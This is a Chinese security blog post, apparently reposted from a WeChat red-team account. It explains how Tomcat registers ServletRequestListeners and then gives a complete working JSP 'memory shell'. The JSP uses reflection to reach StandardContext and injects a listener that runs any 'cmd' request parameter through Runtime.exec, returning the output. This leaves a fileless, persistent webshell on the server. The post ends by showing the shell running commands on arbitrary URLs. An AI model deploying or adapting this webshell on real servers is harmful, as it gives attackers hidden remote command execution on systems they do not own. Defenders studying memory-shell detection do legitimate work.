初探Listener内存马

admin 2022年4月2日19:35:13评论34 views字数 4471阅读14分54秒阅读模式

Listener基础

配置Listener

package com.naihe2;

import javax.servlet.ServletRequestEvent;
import javax.servlet.ServletRequestListener;

public class testListener implements ServletRequestListener {

    public void requestDestroyed(ServletRequestEvent sre) {
        System.out.println("这里是requestDestroyed");
    }

    public void requestInitialized(ServletRequestEvent sre) {
        System.out.println("这里是requestInitialized");
    }
}

xml配置

<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd"
         version="4.0"
         metadata-complete="false"
>


    <listener>
        <listener-class>com.naihe2.testListener</listener-class>
    </listener>

</web-app>

流程分析

初探Listener内存马


读取配置文件

初探Listener内存马


读取web.xml,处理后将信息存储在webXml中

初探Listener内存马

配置context

初探Listener内存马

直接遍历并添加至addApplication中

初探Listener内存马


初探Listener内存马


初探Listener内存马



以上步骤就是将webxml中的listener相关的数据添加到ApplicationListener

接下来直接跟进到listenerStart

获取所有listeners

初探Listener内存马


反射生成了一个testListener对象,及我们自定义的Listener

初探Listener内存马


遍历results中的自定义Listener并添加到eventListeners

初探Listener内存马


初探Listener内存马


将eventListeners中的内容添加到applicationEventListenersList属性中,而后期tomcat使用Listener会从applicationEventListenersList中取出

初探Listener内存马


初探Listener内存马

调用过程

在自定义的Listener的requestDestroyed下断点

初探Listener内存马


可以发现tomcat会自动调用fireRequestDestroyEvent,因此我们进入fireRequestDestroyEvent

初探Listener内存马


初探Listener内存马


这里直接获取applicationEventListenersList属性

初探Listener内存马


遍历applicationEventListenersList并强制转为内容为ServletRequestListener类型

初探Listener内存马


这里直接调用 requestDestroyed方法

初探Listener内存马


对应这自定义的Listener

初探Listener内存马

接下来如何动态添加Listener 在上面分析,tomcat是将web.xml中的信息取出在调用 addApplication,将信息添加至applicationListeners,然后再由listenerStart反射生成实例化的Listener,并在需要调用前调用fireRequestDestroyEvent,在间接调用 requestDestroyed方法,但是分析了过程我们依旧无法主动添加Listener因为applicationListeners接收的是字符串而非一个对象。不过天无绝人之路,StandardContext提供了另一个方法 addApplicationEventListener,可以直接添加一个Lisener对象到applicationEventListenersList

初探Listener内存马


由于ServletRequestEvent至提供了ServletRequest,并没有提供Response,因此需要通过反射获取 Response

初探Listener内存马

内存马

<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<html>
<head>
    <title>Title</title>
</head>
<body>
<%@ page import="org.apache.catalina.core.StandardContext" %>
<%@ page import="java.lang.reflect.Field" %>
<%@ page import="org.apache.catalina.connector.Request" %>
<%@ page import="java.io.InputStream" %>
<%@ page import="java.util.Scanner" %>
<%@ page import="java.io.IOException" %>
<%@ page import="java.io.BufferedInputStream" %>
<%@ page import="org.apache.catalina.connector.Response" %>

<%!
    public class DemoListener implements ServletRequestListener{

        public void requestDestroyed(ServletRequestEvent sre) {
            org.apache.catalina.connector.RequestFacade req = (org.apache.catalina.connector.RequestFacade)sre.getServletRequest();
            Field requestField = null;
            try {
                requestField = Class.forName("org.apache.catalina.connector.RequestFacade").getDeclaredField("request");
            } catch (NoSuchFieldException e) {
                e.printStackTrace();
            } catch (ClassNotFoundException e) {
                e.printStackTrace();
            }
            requestField.setAccessible(true);
            Request request = null;
            try {
                request = (Request) requestField.get(req);
            } catch (IllegalAccessException e) {
                e.printStackTrace();
            }
            Response response = request.getResponse();

            try {
                String cmd = request.getParameter("cmd");
                InputStream is = Runtime.getRuntime().exec(cmd).getInputStream();
                BufferedInputStream bis = new BufferedInputStream(is);
                int len;
                while ((len = bis.read())!=-1){
                    response.getWriter().write(len);
                }
            } catch (IOException e) {
                e.printStackTrace();
            }

        }
        public void requestInitialized(ServletRequestEvent sre) {
            System.out.println("这里是requestInitialized");
        }
    }
%>

<%
    Field reqF = request.getClass().getDeclaredField("request");
    reqF.setAccessible(true);
    Request req = (Request) reqF.get(request);
    StandardContext context = (StandardContext) req.getContext();
    DemoListener listener = new DemoListener();
    context.addApplicationEventListener(listener);
%>
</body>
</html>

效果展示

随便访问一个页面

初探Listener内存马


在访问我们的内存马网页 这里我由于代码没有判断cmd是否为空,所以必须输入东西才能正常访问,你懂的

初探Listener内存马


再次访问之前不存在的网页

初探Listener内存马

往期推荐

interceptor内存马详解(文末赠书福利)

Conntroller内存马详解

tomcat通用回显链从0到1

Servlet内存马探究

从jndi到log4j2

shiro从0到1

fastjson从0到1

Java安全之Commons Collections4-7分析

Java安全之Commons Collections1-3分析

SQL Server从0到1

初探Listener内存马


原文始发于微信公众号(红队蓝军):初探Listener内存马

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年4月2日19:35:13
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   初探Listener内存马http://cn-sec.com/archives/865022.html

发表评论

匿名网友 填写信息